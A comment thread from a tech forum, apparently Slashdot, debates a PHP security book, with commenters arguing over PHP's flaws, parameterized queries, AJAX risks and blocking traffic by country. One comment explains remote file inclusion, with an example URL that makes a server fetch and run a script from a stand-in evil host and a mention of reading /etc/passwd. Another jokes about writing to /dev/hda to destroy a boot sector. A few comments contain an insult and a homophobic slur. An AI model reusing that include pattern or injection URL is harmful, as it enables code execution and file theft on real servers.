If a single guy making a site can figure out how to write a query in his code, he can figure out how to make a stored procedure/prepared statement that does the same thing, and just call on that from his code.

Re:Just don't

[FredFredrickson]

I just wrote a php script, and not only is it perfectly secure, but it was easy to write:

<?
print("hello world");
?>

So, uh, you think you can improve my security?

Re:Just don't

[Zero__Kelvin]

Give me that script and I'll use it to trash your whole system ;-). You need to make sure the SUID bit is not set, and never allow it to be run as root. You wouldn't want someone redirecting the output to /dev/hda (or /dev/sda, etc.) for instance! That would trash your boot sector ;-)

If you are using Windows, it is a different story I concede. If I said what that difference was I'd be modded down pretty quickly (in fact I probably still will, thanks to a recent stalker with several shill accounts). But again, there is much you are not aware of, and many many subtle aspects of computer security. It is hard. Really. The experts say so. Who are we to disagree?

Re:Just don't

[FredFredrickson]

Well clearly my hello world app is running as 99/99, but seriously. I've posted this unassuming php script on a webserver. You going to hack me now?

Re:Just don't

In a heartbeat.

Re:Just don't

[Zero__Kelvin]

Yep.

Re:Just don't

Three bug reports, each about 2 years old, each filed shortly after the filter extension was released, and all fixed in the next release, coupled with a syntax that you dislike, is a reason to avoid the Extension?

yes! Like I said, the underlying php_filter_validate_email uses a copy and pasted regex that rejects valid (per RFC) email addresses and lacks length checks. What impression does that give you about the overall quality of the code?

Hell, try SANITIZING an int, not just filtering it.

Doing so is useful for enforcing types in library code, not very useful for validating user input.

function validateInt($int, $max = PHP_INT_MAX, $min = 0) {
  try {
    if (! is_int($int))
      throw new Exception ('Input validation error, expected integer');
    if (! ($int >= $min && $int <= $max))
      throw new Exception ('Input validation error, integer outside permitted bounds');
    return $int;
  } catch (Exception $e) {
    exit($e->getMessage());
  }
}
 
// PS: the filter API is still hideous
$unsigned_octet = validateInt((int) $_GET['octet'], 255);
$signed_octet = validateInt((int) $_GET['octet2'], 127, -128);

Re:Just don't

[fava]

Heart surgery in isolation may be easy.

What is hard is the knowledge of what to do when something goes wrong. What is hard is the planning in anticipation of things that might go wrong. What is hard is the ability to stay calm and focused when things start to go wrong.

That takes years of study, years of practice and years of learning from your own and others mistakes.

When the risks are high you don't call in a generalist, you call in an expert.

Re:Just don't

[karlconnors]

You are rare. Many programmers would say that security is NOT their job.

Re:Just don't

[Haeleth]

Security 101 is that security needs to be designed in from the ground up. In fact, this is one of the main reasons why Linux is secure, and Windows never will be.

Oh, please. Linux wasn't designed from the ground up to be secure. It was started as a hobby and never intended to be widely used. In the wider sense of the various GNU/Linux-based operating systems such as RHEL and Ubuntu, it was hardly "designed" at all; most of these platforms are composed of a jumble of bits and pieces from all kinds of sources, many of which have turned out to contain serious security flaws over the years.

(And I'm not bashing Linux here. I'm typing this on a Linux box. Just being realistic.)

Re:Just don't

[Zero__Kelvin]

You are a fuckinjg moron

tl;dr;

Could some summarize the review using one word or less?

Thanks.

Re:tl;dr;

[ianare]

Not a problem. It's in my own word though.

PHPisaninherentlyinsecurelanguagesousecaution

Re:tl;dr;

[Zwicky]

Could some summarize the review using one word or less?

I'll be honest, I'm struggling to find just the right word. When I do I'll be sure to let you know. Nonetheless until then I can meet the 'or less' requirement. Here's my summary:

!

Hope this helps.

Re:tl;dr;

Why is PHP inherently insecure?

I think it's because it is so easy to get started. PHP makes non-programmers, people who have never read any books about programming other than html for beginners, and php for dummies feel like they can write web applications.

There is nothing wrong with PHP except that there are a lot of beginner programmers who are using it. Give them a few years and they will be better but there is always a new group of new programmers writing in php.

Re:How to write a secure PHP app

Of course. The best way to make anything secure is to use Microsoft tools and become one yourself.

Are you for real?

Use .NET instead

PHP has been bloated since 1.5, and the new .NET libraries offer improvements over all of PHP's core services. Why bother trudging through the maze of PHP gotchas, when .NET security is just a wizard away?

Re:Use .NET instead

[MightyMartian]

Um, because some of us want to write portable apps that aren't dependent on a single vendor, and don't want to be double-screwed by the forever-not-quite-up-to-date Mono libs. There is a world beyond Microsoft, and besides that, people in glass houses shouldn't throw rocks. I wouldn't exactly go to Microsoft for security.

But I agree that PHP sucks, it's the BASIC of this decade. It's a godawful mess of a language that simply permits idiots too much capacity for getting ill-running programs up with little or no thought to security, to disciplined programming or anything else.

Re:Use .NET instead

[NotBornYesterday]

Security from a MS wizard? Maybe they could teach Clippy to implement security in development!

Hi there! It looks like you are passing user input to an SQL statement. Would you like to:
A) Sanitize your input before going any further.
B) Sanitize, schmanitize, just code that sucker together. We'll iron out the kinks later.
C) Huh? Why would that be a problem?

Re:Use .NET instead

Surely you jest to suggest that a wizard is the answer to security?

Re:Use .NET instead

PHP is just as dependent on a single vendor as .NET.

Re:Use .NET instead

[MightyMartian]

Not really. I can get the source for PHP and do what I like with it. Mono is not in the same category, by any stretch.

Re:Use .NET instead

PHP it's not the best language, but almost any language well used with a good design will produce a good app. Depends on the programmer.

I've seen a lot of good apps made in PHP.

Script kiddies editing ready-to-install apps are not programers and only make shit out of any app.

Re:Use .NET instead

[tepples]

Not really. I can get the source for PHP and do what I like with it. Mono is not in the same category, by any stretch.

What do you mean? Mono is free software.

Re:Use .NET instead

[MightyMartian]

And Mono is, to one extent or another, a reverse-engineered product. You're now not only reliant on Microsoft, but also on the Mono project's ability to get it right. Mono is not .Net, and quite frankly I think there are enough questions about legal encumbrance that I would never use it.

Re:Use .NET instead

[Ninnle+Labs,+LLC]

And Mono is, to one extent or another, a reverse-engineered product.

And that stops you from grabbing the source and doing what you like with it, how?

Re:Use .NET instead

[Bill,+Shooter+of+Bul]

Its adhering to a standard it does not itself control ( or really have full access to in some cases) . Changing it could cause it work in incompatible behavior compared to .NET Which may cause third party libraries/applications to not work as expected. Its like a moon of a planet, rather than a planet of its own. Its orbit, is therefore more complex than a simple two body problem.

Re:Use .NET instead

[Ninnle+Labs,+LLC]

And? You can also take the linux kernel and make changes to it that will cause incompatibilities with drivers/apps that use it. That still doesn't stop anyone from grabbing the source and changing it how they want. And what you described doesn't stop anyone from doing that with Mono.

Re:Use .NET instead

Because web hosting services offering PHP are extremely easy to find, are not expensive, etc. .NET also requires that you tie everything you do to Microsoft (directly or not, wether you want or not).

Re:Use .NET instead

[Bill,+Shooter+of+Bul]

Its a matter of degrees. Planet -> moon. Mono is a second implementation of a spec. Not the first, which means that there are going to be some discrepancies from the first implementation which may cause compatible issues. Take a look at WINE. Another pseudo reverse engineering of a Microsoft product. IT still isn't compatible with everything that runs on windows, even though its free. So I guess the point is its freeness ( while good) does not mean that the thing its trying to replicate is 100% supported on different platforms. Which means win32 is still tied to windows, and .NET is as well.

Re:Use .NET instead

[Gondola]

Anyone can pick up PHP in a few short online lessons and make something productive in an afternoon.

Yes, inexperienced web developers can throw up insecure, poorly-designed sites. Yes, PHP could have more built-in security measures.

However, it's not rocket surgery to create your own standards and libraries to help with security once you have a little knowledge and experience.

Re:God Hates Fags!

[Leafheart]

Linux Torvalds (snip.) Linux Torvalds (snip.) Linux Torvalds (snip.) 'Linux Torvalds?' (snip.) Linux Torvalds (snip.) Linux Torvalds's

Who is this Linux Torvalds you keep talking about? Is that a new distro I don't know?

Re:How to write a secure PHP app

[ianare]

AAaaww what a cute little troll. I was just about to feed you.

Simpler method

Simpler method than reading this book:

1. Use Drupal
2. When writing modules always ensure you use Drupal's API, particularly for paramaterisation of Database queries and such. Check http://api.drupal.org/

Re:Simpler method

[ianare]

It's true that using frameworks makes things a lot easier, especially for filtering and validation. But a good understanding of why certain things have to be done is more important in the long run. I've seen the best frameworks destroyed by programmers bypassing major security precautions out of laziness or for "performance tuning".

Re:Simpler method

[Lobster+Quadrille]

...Because Drupal is bulletproof

Can you just block by country?

[tjstork]

A lot of bogus traffic comes from countries that don't offer much in commercial value. I'm wondering if you could just configure Apache to just refuse connections to certain countries, or take them to an alternative page. Like, "404, We're sorry Russia, but you have too damned many crooks."

Even still, one wonders if ISPs offer that service as well.

Re:Can you just block by country?

[myVarNamesAreTooLon]

That would work well, people from other countries would NEVER think of spoofing their address.

Re:Can you just block by country?

[Chandon+Seldon]

This is a bad idea.

The only thing it might stop is automated scans, and your application shouldn't have those holes to begin with. It'll have basically no effect on targeted attacks (attackers know about proxies), and it will annoy the hell out of the - unknown number of - visitors you would have from these countries.

Re:Can you just block by country?

[InsertWittyNameHere]

Ok, but that might backfire. Take this hypothetical situation as an example:

Let's say a Nigerian prince recently became the beneficiary of a large sum of money. Now in order to access that money he needs someone to lend him some seed money in order to fund the process to facilitate the release of said money. In return for the help, he promises to reward the lender generously.

If he can't reach you with his urgent message YOU will be the one losing out!

Re:Can you just block by country?

[neoform]

Get an IP2Location database, there's a bunch of free ones on the net. Then do a lookup based on $_SERVER['REMOTE_ADDR'] at the beginning of all your scripts.. there might be an apache mod for this, but I've never used such a thing.

Re:Can you just block by country?

[clarkkent09]

A lot of bogus traffic comes from countries that don't offer much in commercial value.

Depends on what you're selling. If your products have global appeal, you might well be losing some customers from Russia. I have setup and maintained credit card processing system for a number of sites and in my experience about 95% of customers are from USA and Europe, the remaining 5% split between Australia, Japan, S. Korea, Russia, Israel, and very occasionally a South American or one of the wealthier Arab countries. So I guess it is possible that you can exclude some countries and not lose much, but it's not as easy as you think. You also may lose reputation if you are a serious company and people see a message like that pop up due to failings with IP geolocation or simply because your client went on a trip. IMO it also makes the internet a sadder place. Imagine if such practice became widespread and every site started excluding traffic on country by country basis based on what commercial value each country represents. Given the numbers I mentioned above, most of the world would effectively be cut off from the internet, except for their local sites.

Re:Can you just block by country?

You can add an ip filter, every coutry has a segment assined, so probably you can do someone like that

Re:Can you just block by country?

I've had a few customer request that their server be configured this way, and I would bet that doing so has blocked an enormous number of attacks. Yes, you can spoof IP addresses, but from what I've seen, almost all successful attacks on servers are from foreign IP addresses in either Russia, China, or Brazil.

Re:Can you just block by country?

I'm guessing this is precisely the kind of idea that a book on security might say is a really, really, really bad one.

Re:Can you just block by country?

[shutdown+-p+now]

A lot of bogus traffic comes from countries that don't offer much in commercial value. I'm wondering if you could just configure Apache to just refuse connections to certain countries, or take them to an alternative page. Like, "404, We're sorry Russia, but you have too damned many crooks."

For one thing, if you have security vulnerabilities, does it really make much difference to you whether they'll be exploited by a guy in Russia, or a guy in USA? Because they will be exploited if they're there.

There's one more thing. Personally, if I ever stumbled onto a web site that blocked me because of my originating country, I would be very annoyed. In fact, I might actually be sufficiently annoyed to waste my precious time finding a proxy, and then thoroughly checking that site for vulnerabilities, simply so that I can get satisfaction from reversing the check & error to "404, We're sorry US, but you have too many xenophobic idiots".

Re:Can you just block by country?

[tjstork]

For one thing, if you have security vulnerabilities, does it really make much difference to you whether they'll be exploited by a guy in Russia, or a guy in USA? Because they will be exploited if they're there

Yeah, there is a difference. In the USA, I can call the cops and they can go after someone in the USA. Even if it were the EU as a source, I could call the cops from that nationality, or American law enforcement could look for extradition, and vice versa. But Russia has obviously no interest in enforcing any sort of law on the internet, unless its someone making fun of Putin, in which case, they will be shot. Maybe another answer is to return messages back, randomly implicating the browser in an anti-Putin conspiracy, and let the potential offender contemplate their assault on my systems from Lubyanka

Re:Can you just block by country?

[shutdown+-p+now]

Yeah, there is a difference. In the USA, I can call the cops and they can go after someone in the USA. Even if it were the EU as a source, I could call the cops from that nationality, or American law enforcement could look for extradition, and vice versa. But Russia has obviously no interest in enforcing any sort of law on the internet, unless its someone making fun of Putin, in which case, they will be shot.

I can assure you that it's nowhere near as bad as that. I've made fun of Putin on many occasions, and not only I wasn't shot, but they've actually let me left the country.

You only get shot if you start making fun of Putin on TV in prime time, or something like that. Even then they won't shoot you - why? they'll just grab you for tax evasion, all nice and civilized.

Anyway, if you're really willing to block entire countries, consider who are you aiding in case of Russia/China/Iran there - if blocking becomes standard practice in the West, that's really a very good excuse for the Russian government to introduce its own nationwide blocking - tit for tat, so to speak - and for China and Iran to tighten their existing filters. Russian government has been dreaming of "Russian national Internet" for a while now, complete with Cyrillic domain names and "properly" censored, but it's not there yet. Meanwhile, the 'Net is pretty much the only source of government-independent information left in Russia at the moment. If you actually care about freedom, please don't play into their hands by aiding them to shut it down, sealing the informational blockade.

Re:Can you just block by country?

[Lobster+Quadrille]

Really?

I've done forensics on a LOT of compromised sites, and the fact is that in 99.99% of cases, the cops don't care in any country.

Unless there's major losses, particularly monetary, or it ties in with another investigation, nobody is even going to call you back.

Sure, a major, targeted attack will get their attention, but you can bet they're using a small stack of proxies in that case.

inherently insecure....

"Tricia and William Ballad argue that PHP is an inherently insecure language"

If it was inherently insecure you could never secure it, I rather think that is it up to the developer to set his security level - the language does not offer any false promises of being secure (which is probably a best practice as any developer should be more aware how in/secure their apps are and know how to secure them better).

We've seen that closed source models that touted secure system (or my favorite, "improved security") aren't always and then the poor developers on such platforms can't do much but wait for those powers-that-be to do their "magic" and fix their security, and may not know if it was really fixed or not.

what no AJAX

[ianare]

AJAX is probably the biggest security hole, even in a well designed application. Be especially careful when the AJAX does a DB update/insert - sometimes all the attacker needs is the JS code (obviously not secure) to see what url to hit and what parameters to send.

I find it very disappointing that this book doesn't cover that. Even if not an in-depth analysis, which could well require its own volume, at least a chapter on basic concepts.

Because otherwise PHP security is actually pretty simple. There's only 3 major rules :
Never trust anything from outside : filter/validate all user input.
Don't display error messages on production servers.
Wrap system binaries in scripts rather than executing them directly.

Re:what no AJAX

[dedazo]

Be especially careful when the AJAX does a DB update/insert - sometimes all the attacker needs is the JS code (obviously not secure) to see what url to hit and what parameters to send.

Well yes, but usually you're doing cookie-based authentication, which flows with out of band requests as well. So it's no different than a normal POST operation. Ajax is not particularly less or more secure, unless you have an insecure app to begin with.

Re:what no AJAX

[truthsearch]

I don't understand your point. From the server's perspective an AJAX request is identical to any other. So how does securing your server change if the request is AJAX?

Re:what no AJAX

[drspliff]

Because developers forget that just because somethings hidden in thousands of javascript and never invoked directly by users doesn't mean that it won't be a target, if anything it makes it more of a target because us security folks have long since picked up on that :)

Re:what no AJAX

[SatanicPuppy]

The number of people who don't know how to lock down a database astounds me. Whitelist IPs, use low privilege users, never re-use users between applications.

If you screw up your injection scrubbing, and someone sends in a "Drop tables" injection on a user who doesn't have those permissions, there's no issue. Likewise, lock the user down so it only has access to specific data...Never give a user the ability to touch a system table if they're used for a public app.

I don't allow deletions most times, I just add a delete flag to the record, and use an account running locally to do the deletes later...Someone tries to delete a whole table, row by row, and I can catch it before it happens.

Securing your code is necessary, but it shouldn't be your primary line of defense. Start at the server and work your way back.

Re:what no AJAX

[ianare]

Securing the server doesn't change, and if you follow proper security guidelines you will be generally OK. It's just that AJAX does add complexity, and any time complexity increases, so do potential exploits.

For example some devs will forget that the return needs to be tested not to contain potentially dangerous information ... things like DB structures or users, info only visible to certain users, etc. Quite often this may be debug info that needs to be turned off on production, but because it's hidden under a layer of JS, people forget.

Re:what no AJAX

[dblackshell]

I would add to those:

• don't filter/validate using regular expressions unless you know what you're doing.
• don't give too much power to the user (of course it will abuse it)...

Re:what no AJAX

[MightyMartian]

This is a pretty damned good component, and goes to show you that security should be thought about like layers of onion. Due diligence at every layer means that even if worst comes to worst (say, there's a serious flaw in the interpreter itself), that there's something below that that can catch, or at least minimize the extent of the breach. Having your app access a user with privileges like "drop table" is nuts, no matter whether you think you have ironclad security on the app itself.

Re:what no AJAX

[Tom]

sometimes all the attacker needs is the JS code (obviously not secure) to see what url to hit and what parameters to send.

And if the obscurity of your URL and parameters is what you call "security", then you probably shouldn't be writing any apps, and PHP, Ajax or whatever is not where your problem is.

Re:what no AJAX

[fractalus]

Cookies + no XSRF protection = exploit.

Re:what no AJAX

[Manuel+Iglesias]

A little off-topic, but here http://weblogs.asp.net/fbouma/archive/2009/02/19/soft-deletes-are-bad-m-kay.aspx you have an interesting opinion on soft deletes

Re:what no AJAX

[Jaime2]

A lot of people have been doing security in the presentation layer for years and some of them don't realize that AJAX gives clients an easy way to bypass the presentation layer. It doesn't matter how well designed the authentication system is if the attacker is a valid user.

Re:what no AJAX

[alex4u2nv]

And this is what that section of the book will help him to understand ;)

Re:what no AJAX

Mod parent up. I take great care to avoid injection with addslashes() but still missed one right on the main signup page for my app. A client notified me over a year after the code was published.

Parent's suggestion doesn't really help me... since DELETE is needed for operation of the application, and I can't see instructing newbies to create two MySQL accounts... but it does help on another site where updates occur frequently in the background. For admin purposes a separate user could be used for delete statements.

Re:what no AJAX

[Lobster+Quadrille]

Ajax doesn't cause the sever-side security holes, it's the PHP scripts that handle it, and the same rules as always apply then.

Ajax does have its own set of issues, but they're not PHP's problem, and thus, don't belong in a PHP book.

Re:what no AJAX

[SatanicPuppy]

I actually tend not to use that method except with RDBMs like MySQL, and I only use them in a limited way (I don't maintain a "history"; I just defer the actual deletes for an hour or two, so I can lock down the "writer" account to update and insert only).

It's a bit different with a fancy RDBMs like MSSQL or Oracle. You can actually dump the stuff to a real history table there, using a trigger and a stored procedure.

Re:what no AJAX

[garyebickford]

IIRC the Daily WTF had an example where the actual SQL statement to be executed was coded into the javascript in the page and filled with variables from the form, then sent back to the server, where the server side just passed the SQL to the database.

I think that qualifies as a bad idea. :)

Re:what no AJAX

[dedazo]

It doesn't matter how well designed the authentication system is if the attacker is a valid user.

If your application can be attacked by a "valid user" then you might as well not have any security at all. This has nothing to do with what tier the authentication or authorization takes place in, or how the request is issued from the client.

Re:what no AJAX

[Jaime2]

Authorized user attacks are among the most common and often the most dangerous. Here is a simple way that one happens:
Developer writes a back-end service that modifies data. Developer then creates a front-end web app that calls the service. Developer codes security by coding the server-side code of the web app to refuse to call the back end if a user doesn't have sufficient authority to perform the target action. This scheme works fine as long as the back-end service is only accessible from the front-end. As the app is "upgraded" to an AJAX app, the back-end is made directly callable via http from the client. Oops, a security hole has been created that the QA department will likely not find.

If QA uses a fuzz tool, and the back-end has an authentication scheme that is shared with the front-end (like cookies), the tool will not find the hole. We have just created a security flaw where any valid user can access any application functionality.

Re:How to write a secure PHP app

[cbiltcliffe]

Are you for real?

No. Otherwise they wouldn't have posted AC. .....just like you.

As a programmer

[NotQuiteReal]

If I had to, under certain circumstances, I would take a stab at doing what a heart surgeon would do. If it didn't go right, then I might consider reading up on the procedure.

However, if the patient survives long enough to be released, I am confident that I could simply document any lingering anomalies he might suffer as a feature, not malpractice.

inherently insecure?

[gsgleason]

What makes php more inherently insecure compared to other scripting languages that a web app might use? There are plenty of functions to "sanitize" input and satisfy the other "major rules," so why is php scrutinized more than others?

Re:inherently insecure?

There are some scripting languages that do a lot of sanitizing automatically... In order to get at "unsanitary" contents, you have to access a function. One example is Coldfusion (mostly dead scripting language at this point)

Re:inherently insecure?

[benjymouse]

1. Culture. For a long time the mysqli library did not allow the use of parameterized queries leading to the unhealthy culture of concatenating or interpolating sql queries and even "require" arguments.
2. Easy entry with little architectural guidance which leads beginners down the dangerous paths.
3. Poor design decisions such as (just examples)
   1. the ability to "require" scripts from foreign servers.
   2. stupid type coercion such as 1 == "1more" is actually true.
   3. super-weak type system, meaning that you can never trust what you expect to be an integer to be just that.
   4. stupid attempts to accomodate developers and save LOCs by introducing "magic quotes", superglobals and the ability to "automagically" map query parameters to global variables.
4. The fact that PHP is merely a glue layer, relying on binary extensions written in C with the usual buffer overflows, memory corruptions etc.
5. etc etc etc

Re:inherently insecure?

The truth sure does hurt.
But PHP is ... ! ... ::sigh::

Re:inherently insecure?

[Terrasque]

You forgot the (IMO) most important one:

6. Much of the example code starters learn from looks like it's been coded by a retarded monkey who's just raided the LSD factory.

Re:inherently insecure?

[memristance]

Your first point is valid enough, and your second one does hold some water, but it seems that it has already been addressed by other books on programming in PHP. Further, if I fully understand what your second point is talking about, it would seem that solving it would require getting rid of some of the flexibility (and hence, utility) of the language.

Notably, points 3.2 and 3.3 in your post have already been addressed (not sure about 3.1 or 3.4... never ran into anyone who did 3.1 since it seems incredibly foolish, and haven't heard of any changes yet for 3.4).

3.2: 1 == '1more' is true for two reasons: you're using the weak equivalence operator (hence why a string and an int can be equivalent) and your string starts with valid numeric data which can be converted properly while the rest is ignored. See here for more examples of what would and wouldn't be converted.

3.3: Using the strict equivalency operators ('===' and '!==') in your conditional statements solves this. According to the link, this has been available since PHP 4 so I'm not sure why you're still going on about it...

Your fourth point doesn't necessarily make PHP any less secure than any other programming language that can use external libraries, unless the ones PHP uses are particularly poorly written. While it is true that most of the issues with buffer overflows and memory corruptions in C can be more easily avoided with other languages (e.g., Java), it doesn't mean they can't also be avoided in C with careful coding.

Re:inherently insecure?

[TheSpoom]

Culture. For a long time the mysqli library did not allow the use of parameterized queries leading to the unhealthy culture of concatenating or interpolating sql queries and even "require" arguments.

And now it does. And there were other libraries that supported parameterized queries prior to mysqli supporting it. I agree that there are beginners who give the rest of us a bad name by not coding for security to begin with, but to say that that makes the language itself insecure is an unfounded assertion.

Easy entry with little architectural guidance which leads beginners down the dangerous paths.

The fact that the language is easy makes it insecure? So I guess we should all be programming in assembly to be completely secure? Oh, wait, that's stupid, since it's just as easy to have a buffer overflow in assembly as anywhere else.

the ability to "require" scripts from foreign servers.

Nobody does this; not once have I seen it in my eight or so years of coding PHP.

stupid type coercion such as 1 == "1more" is actually true.

That's what === is for, it does type checking.

super-weak type system, meaning that you can never trust what you expect to be an integer to be just that.

Again, an ease of use thing. If you want an integer, cast to int as you would in C, or use one of the checking mechanisms.

stupid attempts to accomodate developers and save LOCs by introducing "magic quotes", superglobals and the ability to "automagically" map query parameters to global variables.

Magic quotes is stupid. Thankfully, this has been discussed to death and they're disappearing as of PHP 6. Superglobals are fairly limited and used mostly for input. And register_globals is almost always off nowadays and, like magic quotes, will be removed as of PHP 6.

The fact that PHP is merely a glue layer, relying on binary extensions written in C with the usual buffer overflows, memory corruptions etc.

You could say the same about ASP.NET, yet it's used by huge enterprises. Haven't you ever heard of abstraction? Besides which, the "usual buffer overflows" in the underlying extensions of PHP are quite rare, and the fact that they're often used in more than just PHP means more eyes are examining them for security issues.

Inherently insecure my ass. If you're a crappy coder, you'll make crappy code. If you know what you're doing, you'll make code that's secure. Protecting an app against attackers is the developer's job, not the language's.

Re:inherently insecure?

[nxtw]

You could say the same about ASP.NET, yet it's used by huge enterprises.

Have you used .NET or Java? Quite a bit of code runs in the CLR/JVM, incluing things like text processing / XML libraries and many database drivers. For code only using .NET or Java (no native calls), buffer overflows are simply nonexistent, unless there's a problem in the CLR/JVM. Many applications only use native calls for network communication, through the (very frequently used) system libraries.

Re:inherently insecure?

[TheSpoom]

...unless there's a problem in the CLR/JVM.

Which is effectively similar to the claim that something could be wrong in either the PHP binary or an extension. Since PHP doesn't use pointers, buffer overflows in PHP code itself is likewise practically non-existent.

Re:inherently insecure?

[benjymouse]

Nope, not the same. The CLR/JVM are comparatively very small cores and offers intrinsic protections against memory corruption, dangling pointers, buffer overflows etc. The extension mechanisms in CLR/JVM are based on that intrinsic level. With PHP practically all useful functionality (unless you write "extensions" in PHP) such as regex, xml serialization, net/socket communication, certificate parsing etc etc are all written on top of C. Which is not a language known for it intrinsic protections against memory corruptions and buffer overflows. To put it mildly.

Re:inherently insecure?

[1110110001]

The usual "haven't really used PHP, but read enough rants to know it".

1. Culture. For a long time the mysqli library did not allow the use of parameterized queries leading to the unhealthy culture of concatenating or interpolating sql queries and even "require" arguments.

That's the first version of mysqli from 2003. In line 148 you'll find: "PHP_FUNCTION(mysqli_bind_param)". Mysqli had it since the beginning.

3. super-weak type system, meaning that you can never trust what you expect to be an integer to be just that.

If its type is int it's an int. Nothing unexpected. Or do you mean you can't trust HTTP, because a client could send nonnumerical values in a header that should be numeric. You see it's usual on the web to have everything transfered as string and PHP is made for this usecase. But if you don't have data from outside you don't have these uncertainness.

4. stupid attempts to accomodate developers and save LOCs by introducing "magic quotes", superglobals and the ability to "automagically" map query parameters to global variables.

One thing are mistakes made years ago. The other is not breaking existing code in a minor version. Someone still using stuff like magic quotes has turned it on on purpose or wouldn't read any warning anyway.

4. The fact that PHP is merely a glue layer, relying on binary extensions written in C with the usual buffer overflows, memory corruptions etc.

PHP isn't just a glue layer at least since PHP 5. And if C is so bad, what are all the other scripting languages written in?

Re:inherently insecure?

[Terrasque]

As for include from other servers, I've seen that several times on php sites.

Some genius coders often do something like this:

page = GET[page]
Header bla bla bla
include(page)
footer bla bla

where the url is something like index.php?page=contact.php. You can do page=http://www.evil.com/evilscript.txt and PHP will happily connect to the server, download the txt, and execute all php code in it!
What I think the GP means is "Why the HELL is this a feature??" :)

For the record, you can also do local files, like /etc/passwd.

Re:inherently insecure?

1. Works now
2. True, stupid programmers do stupid things
3.1. See 2.
3.2. Use ===, see 2
3.3. intval()
3.4. solved with newer PHP-versions.
4. Yeah, everyone should program C. or assembly. Would have gotten rid of all the noobs too.
5. Good point.

huh?

attackers can see regular requests in plain sight too. ajax is nothing special when it comes to securing applications.

Use a framework

[Anonymous+Showered]

I use CakePHP personally: sanitizes data and offers me ACL out of the box.

Re:Use a framework

[TheSpoom]

I <3 CakePHP (though I like Auth as opposed to ACL).

Re:Use a framework

[Otto]

+1 for use of frameworks.

I'm not big on CakePHP though. Strikes me as confusing. I like the more minimalist Zend Framework for my day to day stuff.

"inherently insecure" is a bad phrase

[MattW]

One might be charitable and infer they meant that PHP is inherently insecure, as in - if you don't take steps to properly write secure code, it won't be secure. But is that true of any language used in web programming? You're providing a service often trusted with secure data to a bunch of effectively anonymous clients.

PHP has a pedigree which includes a lot of poor design decisions about security, but it certainly is very much possible to write secure PHP code, and lots of places do it.

Re:"inherently insecure" is a bad phrase

[MrHorse]

its true for _any_ language. If you don't break your program before you make it available to the public, you're just asking for someone to pounce all over it.

Security should be addressed on both ends of the spectrum...the server side (developing a solid tough to crack nut of a server side app) and client side ( developing a secure unbreakable client side app). unfortunately, in the commercial world, deadlines and such limitations plague this to no end...thus sloppy insecure code from deadline pressed coders.

Can someone explain

[MyLongNickName]

Why securing a PHP application would be any different than securing an application written in any other language. I mean is PHP really the only language where you need to sanitize database inputs? Or is this just another principles of security where they inserted code snippets from [insert your language here].

Re:Can someone explain

[seebs]

Probably more a question of "since you're probably writing in PHP, here's some security stuff". PHP's not my favorite language for security-related things; it doesn't necessarily do much to encourage or help with sanity checks.

Re:Can someone explain

[nxtw]

I mean is PHP really the only language where you need to sanitize database inputs?

PHP and classic ASP are the only languages I've used that did not provide a convenient method for parameterized queries. (I no longer use either - classic ASP is dead and I avoid PHP.)

In Java or .NET, it's much easier to use paramaterized queries & has been for quite some time - it is common practice.

Re:Can someone explain

In classic ASP it was plenty easy to do parameterized queries as long as your DB had an OLEDB provider which supported it. Such providers existed for both MSSQL and Oracle, and those were probably the server DBs most commonly used with classic ASP. IIRC, it was also possible to do this if you had the misfortune to be stuck with Access as the DB.

- T

Re:Can someone explain

[Otto]

PHP's mysqli supports parameterized queries just fine.

Admittedly, old versions of PHP didn't have this stuff, but seriously, PHP 5 has been around for several years. Why people haven't switched yet is beyond me.

Re:Can someone explain

Because almost none of the PHP tutorials or sample code use prepared queries. I've had to deal with PHP at two companies now, and I'm really starting to despise the "if I copy some code off the interwebs, that means I don't have to learn anything" cargo cult surrounding it. Also all the guessing what you probably meant to do that it has in common with MySQL.

Re:Can someone explain

[Otto]

Sounds like you need to get some actual programmers instead of script kiddies. PHP is an okay language, but it is very easy to learn, so a lot of "new" programmers don't really have the background necessary to use it properly.

As with any programming language, it is possible to shoot yourself in the foot with it.

Get Chris Shiflett's book instead

[MattW]

What qualifies these authors to even write on these topics? Do they engage the community of PHP developers at all? Do they have the exposure to enough environments and circumstances and code to be effective authors on the topic?

Chris Shiflett is the CTO of OmniTI, arguably one of the biggest PHP development braintrusts around. Several of the Schlossnagle family work there (and it used to include George, who wrote the awesome Advanced PHP Programming. Chris wrote Essential PHP Security, and also maintains a blog that has a lot of good stuff.

If I was buying one, I'd buy Chris's book.

Re:Get Chris Shiflett's book instead

[Dirtside]

Since you're already at +5, I'll just concur with your post. I've met Shiflett, and he knows what the hell he's talking about.

Also, his book is about 1/3 the length of this one, and from what I can tell, contains more or less all the same info ;)

Re:Get Chris Shiflett's book instead

[wrballad]

I am one of the authors of this book. We had several gigs hardening PHP applications for developers who where self taught, this is what qualified us to write the book (and yes we were engaged in that PHP community). I agree with your main point, if you are a slashdot reader, buy Shifletts book, its probably the best on this topic. My book was not meant for you. If you know someone who is not a hard-core techie writing a PHP website, please point them at mine...if they can comprehend what we wrote and are hungry for more, then point them at Mr Shiflett. Honestly most security books would go over our intended audience's head, we tried to write this in a straight forward manner that a non-techie could easily grasp. This did lead the book to simplify some ares. We felt that it was better to at least try to have some security then none at all. If you look at the book you may notice that we explicitly list Chris' book as a invaluable resource for further study.

Re:Get Chris Shiflett's book instead

[trawg]

My mod points just vanished today, but if anyone else has some this is prolly worth modding up to clarify the differences between the books.

Re:Get Chris Shiflett's book instead

I would have prefered to have had this little blurb about the book's audience available on BN. Amazon before I bought this book. I was very disappointed in the quality and depth and breadth of this book. I was also struck by the use of some rather old methods. There was no utilization of filtering or PDO. The only bright spot was the testing stuff. But this book offered little in the way of new or even current best practices. If you take development seriously rather than having your website created by the neighbor's nephew there are far better books on the topic.

Re:Get Chris Shiflett's book instead

[Martian_Kyo]

love his contribution to the foo fighters.

Re:Get Chris Shiflett's book instead

[wrballad]

there are. This is ment for the nephew stuk on a host that supports PHP4. ITs nice to be an ubergeek who workes in the world of the cuttign edge...most of the web is stuck in the past.

Re:Get Chris Shiflett's book instead

Ummm. No. Raise your hand if "someone who is not a hard-core techie writing a PHP website" scares the hell out of you too.

Are these the same kind of developers that all whined about losing their jobs when the DotComBomb landed?

Are you kidding me? People in charge of securing an app can't be held to the standard of a decent tech book?

Yeah, I know it happens, but I think books like this are terrible, they just encourage people who don't know what they are doing to think that they do.

I mean come on. Using single quoted attributes in HTML is right up there with the fucking BLINK tag.

No language is secure

[mlwmohawk]

PHP is not inherently more or less secure. That's just marketing language to get you to buy the book.

All public access to systems via any language creates potential security holes, ESPECIALLY when terms are accepted from users and used in conjunction with database queries.

